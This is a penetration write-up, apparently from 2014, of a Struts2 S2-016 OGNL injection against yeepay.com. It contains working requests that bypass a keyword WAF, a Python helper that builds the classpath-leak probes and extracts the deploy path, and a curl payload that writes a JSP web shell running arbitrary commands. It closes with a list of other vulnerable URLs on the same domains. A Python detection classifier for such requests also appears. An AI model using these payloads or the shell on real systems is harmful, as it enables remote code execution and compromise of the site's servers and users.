Seeing the .action suffix on http://www.yeepay.com/individualservice/Login.action, I did the habitual Struts test, the redirect: prefix (the S2-016 OGNL injection point):
http://www.yeepay.com/individualservice/Login.action?redirect:/xxoo
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 08:34:12 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/xxoo
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=2736695488.36895.0000; expires=Sat, 20-Dec-2014 8:49:12 GMT; path=/
It redirected, so there was something here: the prefix is honoured (on its own that is already an open redirect). I went straight for the command-execution exploit, only to find it was blocked by a WAF.

Not giving up. Testing showed the WAF filtered allowStaticMethodAccess and ProcessBuilder, so command execution was out; the next question was whether I could write a shell instead:
http://www.yeepay.com/individualservice/Login.action?java.io.File ---> is OK
http://www.yeepay.com/individualservice/Login.action?java.io.PrintWriter ---> is OK
File classes go through. Evidently the rules were built only from keywords pulled out of the public command-execution exploits, and File operations are let straight through. A keyword blocklist leaves exactly this gap: new java.io.PrintWriter(...) is a constructor call and #a.write(...) an instance-method call, neither of which needs allowStaticMethodAccess (that flag only gates @class@method static calls), and the OGNL expression itself is never inspected. So, on to writing a shell.

0x1 Finding the web directory
org.apache.catalina.jsp_classpath contains the project's deployment path, which can be picked out of it. Because yeepay's web container is JBoss, there seems to be a limit on URL length, so the value has to be read out in slices (a local Tomcat test had no such limit). First locate the position of individualservice in it:
http://www.yeepay.com/individualservice/Login.action?redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).indexOf(%22individualservice%22)}
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 08:55:06 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/8232
Content-Language: zh-CN
The position is 8232; now cut a window around it with substring (sent as a POST body this time, which the prefix accepts just as well as the query string):
curl -i http://www.yeepay.com/individualservice/Login.action -d 'redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).substring(8100,8400)}'
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 10:01:42 GMT
Content-Length: 0
Connection: keep-alive
Location: http://www.yeepay.com/individualservice/efault/tmp/deploy/tmp4813126319445231330servlets-default.jar:/export/home/jboss-4.0.3SP1/server/default/deploy/jbossweb-tomcat55.sar/:/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/:/export/home/jboss-4.0.3SP1/lib/gnu-regexp.jar:/export/home/jboss-4.0.3SP1/server/default/lib
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=186558656.36895.0000; expires=Sat, 20-Dec-2014 10:16:42 GMT; path=/
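To make the two probes above reproducible, here is an added example in Python (my code, not part of the original write-up): it builds the redirect:${...} OGNL probes with the same percent-encoding the page's requests use, recovers the index from the 302 Location, picks the substring window, and parses the leaked classpath fragment into the exploded .war directory. The hostname, paths and the two Location values are the ones shown above; the ':' classpath separator is an assumption (Unix target).

```python
import urllib.parse

# Added example, not code from the original write-up. CTX and the two
# LOCATION_* values are constructed from the 302 responses shown on the page.
CTX = "http://www.yeepay.com/individualservice/"
LOCATION_INDEX = CTX + "8232"
LOCATION_WINDOW = (
    CTX + "efault/tmp/deploy/tmp4813126319445231330servlets-default.jar:"
    "/export/home/jboss-4.0.3SP1/server/default/deploy/jbossweb-tomcat55.sar/:"
    "/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/:"
    "/export/home/jboss-4.0.3SP1/lib/gnu-regexp.jar:"
    "/export/home/jboss-4.0.3SP1/server/default/lib"
)

# #application is the ServletContext attribute map; Jasper stores the JSP
# compile classpath under this attribute.
JSP_CLASSPATH = "#application.get('org.apache.catalina.jsp_classpath')"


def ognl_redirect(expr: str) -> str:
    """Wrap an OGNL expression in the redirect: prefix, percent-encoding it the
    way the page's requests do: # ' " and spaces are encoded, ${}(),./ are not."""
    return "redirect:" + urllib.parse.quote("${" + expr + "}", safe="${}(),/")


def probe_index(app: str) -> str:
    """Probe 1: where does the webapp name sit inside the (very long) classpath?"""
    return ognl_redirect(f'{JSP_CLASSPATH}.indexOf("{app}")')


def probe_window(index: int, before: int = 132, after: int = 168) -> str:
    """Probe 2: slice a window around that index, because the container would
    not return a Location carrying the whole classpath. The defaults reproduce
    the page's substring(8100,8400) for index 8232."""
    start = max(0, index - before)
    return ognl_redirect(f"{JSP_CLASSPATH}.substring({start},{index + after})")


def parse_index(location: str, ctx: str = CTX) -> int:
    """The redirect target is ctx + str(expression result); recover the int."""
    tail = location[len(ctx):]
    if not tail.isdigit():
        raise ValueError(f"expression result is not an index: {tail!r}")
    return int(tail)


def extract_webapp_dir(location: str, app: str, ctx: str = CTX) -> str:
    """Split the leaked fragment on ':' (Unix classpath separator, assumed) and
    return the exploded .war directory for `app`, with a trailing '/'."""
    for entry in location[len(ctx):].split(":"):
        if entry.rstrip("/").endswith(f"/{app}.war"):
            return entry.rstrip("/") + "/"
    raise LookupError(f"{app}.war not in this window; widen or move the window")


if __name__ == "__main__":
    print(probe_index("individualservice"))
    idx = parse_index(LOCATION_INDEX)
    print(probe_window(idx))
    print(extract_webapp_dir(LOCATION_WINDOW, "individualservice"))
```

The window defaults are chosen so that the second probe is byte-for-byte the body of the curl command on this page; if the name sits in a different place on another host, move the window rather than widening it, since a longer Location is what the container choked on.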
Found the web directory: /export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war

0x2 Writing the shell
curl -i 'http://www.yeepay.com/individualservice/Login.action' -d 'redirect:${(%23a%3d(new%20java.io.PrintWriter(%22/export/home/jboss-4.0.3SP1/server/default/deploy/individualservice.war/lala.jsp%22)),%23a.write(%27%3C%25%40%20page%20import%3D%22java.io.*%22%20%25%3E%20%3C%25%20String%20cmd%20%3D%20request.getParameter(%22cmd%22)%3B%20String%20output%20%3D%20%22%22%3B%20if(cmd%20!%3D%20null)%20%7B%20String%20s%20%3D%20null%3B%20try%20%7B%20Process%20p%20%3D%20Runtime.getRuntime().exec(cmd)%3B%20BufferedReader%20sI%20%3D%20new%20BufferedReader(new%20InputStreamReader(p.getInputStream()))%3B%20while((s%20%3D%20sI.readLine())%20!%3D%20null)%20%7B%20output%20%2B%3D%20s%20%2B%22%5C%5Cr%5C%5Cn%22%3B%20%7D%20%7D%20catch(IOException%20e)%20%7B%20e.printStackTrace()%3B%20%7D%20%7D%20%25%3E%20%3Cpre%3E%20%3C%25%3Doutput%20%25%3E%20%3C%2Fpre%3E%27),%23a.close())%2b%23a}'
HTTP/1.1 302 Moved Temporarily
Server: Tengine/2.0.3
Date: Sat, 20 Dec 2014 10:04:00 GMT
Content-Length: 0
Connection: keep-alive
Location: http:[email protected]4
Content-Language: zh-CN
Set-Cookie: BIGipServerpool_css=2736695488.36895.0000; expires=Sat, 20-Dec-2014 10:19:00 GMT; path=/
Shell address: http://www.yeepay.com/individualservice/lala.jsp
What the expression did: it assigned a new java.io.PrintWriter on lala.jsp inside the deploy directory to #a, wrote a one-file JSP shell through it (the JSP runs the cmd request parameter via Runtime.getRuntime().exec and prints stdout inside a <pre> block; the \\r\\n is double-escaped because it passes through an OGNL string literal before it becomes Java source), closed the writer, and appended +#a so that the redirect target carries the PrintWriter's string form (java.io.PrintWriter@<hash>), which confirms the object was created and the write went through. Because the .war is deployed exploded, Jasper compiles the new JSP on its first request and no redeploy is needed.
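The WAF observation earlier (keywords from public command-execution exploits blocked, java.io.File and java.io.PrintWriter allowed) is the reason a detection rule should key on the injection primitive rather than on what the payload does with it. The following is an added example, my code and not from the original write-up or from the site: a small request classifier that percent-decodes the query string and body and matches the redirect:/redirectAction: prefix carrying an OGNL expression, OGNL context-variable use, and file or process classes. The six requests are constructed: four reproduce the requests shown on this page, two are benign; the rule names and verdict levels are my own.

```python
import re
import urllib.parse

# Added example, not code from the original write-up. REQUESTS is constructed:
# the first four mirror the requests shown on the page, the last two are
# benign traffic. Rule names and verdict levels are this example's own.

# The write-shell POST body exactly as shown on the page.
WRITE_SHELL_BODY = (
    "redirect:${(%23a%3d(new%20java.io.PrintWriter(%22/export/home/jboss-4.0.3SP1/"
    "server/default/deploy/individualservice.war/lala.jsp%22)),%23a.write(%27%3C%25%40"
    "%20page%20import%3D%22java.io.*%22%20%25%3E%20%3C%25%20String%20cmd%20%3D%20"
    "request.getParameter(%22cmd%22)%3B%20String%20output%20%3D%20%22%22%3B%20if(cmd"
    "%20!%3D%20null)%20%7B%20String%20s%20%3D%20null%3B%20try%20%7B%20Process%20p%20"
    "%3D%20Runtime.getRuntime().exec(cmd)%3B%20BufferedReader%20sI%20%3D%20new%20"
    "BufferedReader(new%20InputStreamReader(p.getInputStream()))%3B%20while((s%20%3D"
    "%20sI.readLine())%20!%3D%20null)%20%7B%20output%20%2B%3D%20s%20%2B%22%5C%5Cr"
    "%5C%5Cn%22%3B%20%7D%20%7D%20catch(IOException%20e)%20%7B%20e.printStackTrace()"
    "%3B%20%7D%20%7D%20%25%3E%20%3Cpre%3E%20%3C%25%3Doutput%20%25%3E%20%3C%2Fpre%3E"
    "%27),%23a.close())%2b%23a}"
)

REQUESTS = [
    # (method, request target, body)
    ("GET", "/individualservice/Login.action?redirect:/xxoo", ""),
    ("GET", "/individualservice/Login.action?redirect:${%23application.get("
            "%27org.apache.catalina.jsp_classpath%27).indexOf(%22individualservice%22)}", ""),
    ("POST", "/individualservice/Login.action",
     "redirect:${%23application.get(%27org.apache.catalina.jsp_classpath%27).substring(8100,8400)}"),
    ("POST", "/individualservice/Login.action", WRITE_SHELL_BODY),
    ("GET", "/individualservice/Login.action?username=bob&redirectUrl=/home", ""),
    ("POST", "/individualservice/Login.action", "username=bob&password=s3cret"),
]

RULES = {
    # The primitive itself: a redirect/redirectAction prefix whose value is an
    # OGNL expression, whatever that expression goes on to do.
    "ognl_redirect_prefix": re.compile(r"(?:^|[?&;])redirect(?:Action)?:\s*\$\{", re.M),
    # OGNL context objects, context-variable assignment, or @class@member access.
    "ognl_context_use": re.compile(
        r"#(?:application|context|request|session|parameters|_memberAccess)\b"
        r"|#\w+\s*=[^=]|@[\w.]+@\w+"),
    # File-write and process primitives: the part the page's WAF only half covered.
    "dangerous_class": re.compile(
        r"java\.io\.(?:File|FileOutputStream|FileWriter|PrintWriter)\b"
        r"|java\.lang\.(?:Runtime|ProcessBuilder)\b|Runtime\.getRuntime|ProcessBuilder"
        r"|allowStaticMethodAccess"),
    # Any redirect prefix at all: open-redirect probe or reconnaissance.
    "redirect_prefix": re.compile(r"(?:^|[?&;])redirect(?:Action)?:", re.M),
}


def decode(text: str, rounds: int = 3) -> str:
    """Percent-decode until stable (bounded), so %2523-style double encoding
    cannot hide a '#'. unquote, not unquote_plus: a literal '+' stays '+'."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def classify(target: str, body: str) -> set:
    """Return the names of every rule that fires on the decoded query and body."""
    query = target.partition("?")[2]
    haystack = decode(query) + "\n" + decode(body)
    return {name for name, rx in RULES.items() if rx.search(haystack)}


def verdict(tags: set) -> str:
    if tags & {"ognl_redirect_prefix", "ognl_context_use", "dangerous_class"}:
        return "block"
    if "redirect_prefix" in tags:
        return "alert"  # open-redirect probe: worth a look, not proof of OGNL
    return "allow"


if __name__ == "__main__":
    for method, target, body in REQUESTS:
        tags = classify(target, body)
        print(f"{verdict(tags):5} {method:4} {target[:60]} {sorted(tags)}")
```

Note that the first page request (redirect:/xxoo) only produces an alert: it is the same primitive without an expression, and a rule that fires only on "dangerous" keywords would have missed both it and the two classpath probes, which contain no class name at all.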
Other applications on the same domains with the same problem:
http://www.yeepay.com/selfservice/requestRegister.action
http://m.yeepay.com/donategroup/PrintDonateCert.action
http://gongyi.yeepay.com/mlove/showMediaInfo.action
http://zht.yeepay.com/zhtservice/login.action